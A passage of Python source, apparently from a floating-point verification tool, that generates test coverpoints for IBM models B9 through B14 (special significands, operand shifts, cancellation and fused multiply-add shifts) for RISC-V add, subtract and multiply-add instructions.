rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Checkerboard pattern ---> rs1_man = '+rs2_man)
coverpoints = []
k = 0
for c in b9_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B9 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b10(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B10 Definition:
This model tests every possible value for a shift between the input operands.
1. A value smaller than -(p + 4)
2. All the values in the range [-(p + 4) , (p + 4)]
3. A value larger than (p + 4)
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param N: No. of sets of coverpoints to be generated. (Predefined to -1. Set to 2)
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:type N: int
:param seed: int
Abstract Dataset Description:
Operand1 = [Random Number]
Operand2 = [A value smaller than -(op1.exp+4), All values in the range [-(op1.exp+4), (op1.exp+4)], A value larger than +(op1.exp+4)]
Implementation:
- The exponent values of operand 1 and operand 2 obey the shift defined above. The mantissa value is randomly chosen and appended with the exponent derived.
- Simultaneously, we convert these numbers into their corresponding IEEE754 floating point formats.
- These operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode ‘0’ for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
exp_max = 255
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
exp_max = 1023
if N == -1:
N = 2
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
else:
random.seed(seed)
b10_comb = []
comment = []
for i in range(1,N):
rs1 = random.uniform(1,maxnum/1000)
rs2 = random.uniform(1,maxnum/1000)
rs1_exp = str(rs1).split('e')[1]
rs2_exp = -1*random.randrange(int(math.log(pow(10,int(rs1_exp)),2))+4, exp_max)
rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(rs2_exp)),10)))
b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
comment.append(' | Exponent = '+ str(rs2_exp) + ' --> A value smaller than -(p + 4)')
for j in range(-(int(math.log(pow(10,int(rs1_exp)),2))+4),+(int(math.log(pow(10,int(rs1_exp)),2))+4)):
rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(j)),10)))
b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
comment.append(' | Exponent = '+ str(j) + ' --> Values in the range [-(p + 4) , (p + 4)]')
rs2_exp = random.randrange(int(math.log(pow(10,int(rs1_exp)),2))+4, exp_max)
rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(rs2_exp)),10)))
b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
comment.append(' | Exponent = '+ str(rs2_exp) + ' --> A value larger than (p + 4)')
coverpoints = []
k = 0
for c in b10_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B10 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b11(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B11 Definition:
In this model we test the combination of different shift values between the
inputs, with special patterns in the significands of the inputs.
Significands of Input1 and Input2: as in model (B9) "Special Significands on
Inputs"
Shift: as in model (B10) "Shift - Add"
We test both effective operations: addition and subtraction.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand1, Operand2 ∈ Abstract Dataset in B9 + Abstract Dataset in B10
Implementation:
- A culmination of the techniques used in the implementations of Model B9 and Model B10 are used to form the dataset.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
e_sz=8
exp_max = 255
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
e_sz=11
exp_max = 1023
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
else:
random.seed(seed)
rs1 = []
b11_comb = []
comment = []
if ops == 2:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
if int(rs1_exp,2) < 4: rs2_exp = -127
else : rs2_exp = random.randrange(-127,int(rs1_exp,2)-131)
comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> A value smaller than (p - 4)'
rs2_exp += 127
if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
if int(rs1_exp,2) >= 250: rs2_exp = 127
else : rs2_exp = random.randrange(int(rs1_exp,2)-123,127)
comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> A value greater than (p + 4)'
rs2_exp += 127
if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
ul = int(rs1_exp,2)-123
ll = int(rs1_exp,2)-131
if int(rs1_exp,2) >= 250: ul = 127
if int(rs1_exp,2) < 4: ll = -127
for expval in range (ll, ul):
rs2_exp = expval
comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> Values in the range (p - 4) to (p + 4)'
rs2_exp += 127
if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
coverpoints = []
k = 0
for c in b11_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B11 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b12(flen, opcode, ops, seed=-1):
'''
IBM Model B12 Definition:
This model tests every possible value for cancellation.
For the difference between the exponent of the intermediate result and the
maximum between the exponents of the inputs, test all values in the range:
[-p, +1].
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result - Operand.Exp ∈ [-p, +1]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The exponent values of operand 1 and operand 2 obey the shift defined above. The mantissa value is randomly chosen and appended with the exponent derived.
- Simultaneously, we convert these numbers into their corresponding IEEE754 floating point formats.
- These operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode ‘0’ for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
else:
random.seed(seed)
b12_comb = []
for i in range(50):
if opcode in 'fadd': rs1 = -1*random.uniform(minsubnorm,maxnum)
elif opcode in 'fsub': rs1 = random.uniform(minsubnorm,maxnum)
ir = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir - rs1
elif flen == 64:
rs2 = Decimal(ir) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
if opcode in ['fadd','fsub']:
b12_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
coverpoints = []
comment = ' | Add: Cancellation'
for c in b12_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, 3):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B12 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b13(flen, opcode, ops, seed=-1):
'''
IBM Model B13 Definition:
This model tests all combinations of cancellation values as in model (B12), with
all possible unbiased exponent values of subnormal results.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result - Operand.Exp ∈ [-p, +1] (The exponent for the intermediate result is chosen such that it is a subnormal number)
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The implementation procedure for Model B12 is repeated with a revised exponent range as defined above.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
else:
random.seed(seed)
b13_comb = []
for i in range(200):
rs1 = random.uniform(minsubnorm,maxnum)
ir = random.uniform(minsubnorm,maxsubnorm)
if opcode in 'fadd':
if flen == 32:
rs2 = ir - rs1
elif flen == 64:
rs2 = Decimal(ir) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
if opcode in ['fadd','fsub']:
b13_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
coverpoints = []
comment = ' | Add: Cancellation ---> Subnormal result'
for c in b13_comb:
cvpt = ""
for x in range(1, 3):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B13 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b14(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B14 Definition:
This model tests every possible value for a shift between the addends of the multiply-add operation.
For the difference between the unbiased exponent of the addend and the
unbiased exponent of the result of the multiplication, test the following values:
1. A value smaller than -(2* p + 1)
2. All the values in the range [-(2*p +1), (p +1) ]
3. A value larger than (p + 1)
We test both effective operations: addition and subtraction. The end values tested are selected to be greater by one than the largest possible shift in which
the smaller addend may affect the result.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param N: No. of sets of coverpoints to be generated. (Predefined to -1. Set to 2)
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:type N: int
:param seed: int
Abstract Dataset Description:
Shift between the addends of the multiply-add operation = [ A value smaller than -(2* p + 1), All the values in the range [-(2*p +1), (p +1), A value larger than (p + 1) ] → Condition 1
Operand 1, 2 = Random
Operand 3 = Condition 1
Implementation:
- The shift between the two addends are constrained by the conditions mentioned in the dataset above.
- Operands 1 and 2 are randomly obtained. But Operand 3 is obtained by ensuring the shift conditions.
- Once the dataset is formed, these operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode ‘0’ for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
exp_max = 127
mant_bits = 23
limnum = maxnum
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
exp_max = 1022
ieee754_limnum = '0x1.fffffffffffffp+507'
mant_bits = 52
limnum = float.fromhex(ieee754_limnum)
if N == -1:
N = 2
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fmsub':
random.seed(1)
elif opcode in 'fnmadd':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
b14_comb = []
comment = []
for i in range(1,N):
rs1 = random.uniform(1,limnum)
rs2 = random.uniform(1,limnum)
rs3 = random.uniform(1,limnum)
mul_exp = int(str(rs1*rs2).split('e')[1])
mul_exp = int(math.log(pow(2,int(mul_exp)),10))
if mul_exp-((2*mant_bits)+1) > -1*exp_max:
rs3_exp = random.randrange(-1*exp_max,mul_exp-((2*mant_bits)+1))
rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp)
rs3_num = float.fromhex(rs3_num)
b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp) + ' --> Difference smaller than -(2*p + 1)')
